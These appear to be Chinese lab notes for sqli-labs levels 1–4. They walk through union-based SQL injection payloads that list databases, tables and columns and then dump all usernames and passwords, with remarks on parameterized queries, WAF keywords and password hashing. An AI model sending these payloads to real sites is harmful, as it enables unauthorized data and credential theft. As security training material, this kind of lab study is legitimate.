sqlilabs 1-4

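报错信息片段：near '1' --+ ' LIMIT 0,1
说明：id 参数被直接拼接进单引号包裹的查询字符串（见下文的 SELECT * FROM users WHERE id='…' LIMIT 0,1），这是注入的根本原因；修复方式是用参数化查询（预编译语句）绑定 id，若 id 应为整数，还应在服务端做整数类型校验。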


?id=999' union select 1,database(),5 --+ 当前数据库
?id=999' union select 1,user(),5 --+ 当前用户名

 

爆数据库（列出所有数据库名）
检测提示：查询参数中出现 union select、information_schema、group_concat 等关键字，可作为 WAF 规则或访问日志告警的特征。
?id=-1' union select 1,group_concat(schema_name),5 from information_schema.schemata --+

后端实际拼接出的语句（URL 中的 + 解码为空格，"-- " 之后的部分被 MySQL 当作注释；以下各节的第二行同理）：
SELECT * FROM users WHERE id='-1'union select 1,group_concat(schema_name),5 from information_schema.schemata --+ LIMIT 0,1

 

爆 security 数据表
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

SELECT * FROM users WHERE id='-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ LIMIT 0,1


爆users表的列
?id=-1' union select 1,group_concat(column_name),5 from information_schema.columns where table_name='users' --+

SELECT * FROM users WHERE id='-1'union select 1,group_concat(column_name),5 from information_schema.columns where table_name='users'--+ LIMIT 0,1


爆 users 的所有数据
防御提示：应用使用的数据库账号应遵循最小权限原则；密码字段应存储加盐的慢哈希（如 bcrypt、Argon2）而非明文，以降低此类泄露的影响。
?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

SELECT * FROM users WHERE id='-1'union select 1,group_concat(username),group_concat(password) from users --+ LIMIT 0,1
